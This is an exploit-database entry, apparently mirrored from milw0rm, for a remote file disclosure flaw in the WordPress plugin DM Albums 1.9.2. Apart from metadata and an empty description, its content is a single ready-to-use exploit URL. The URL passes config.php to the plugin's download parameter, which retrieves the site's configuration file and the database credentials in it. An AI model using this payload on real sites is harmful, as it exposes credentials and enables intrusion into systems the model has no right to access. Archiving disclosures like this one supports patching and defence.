WordPress Plugin DM Albums 1.9.2 - Remote File Disclosure Vulnerability

2014-07-01T00:00:00
ID SSV:66669
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #############################################################################################
[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability
[+] Author : Stack
[+] Greetz : V4 Team & Sec R1z
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
#############################################################################################

# milw0rm.com [2009-06-30]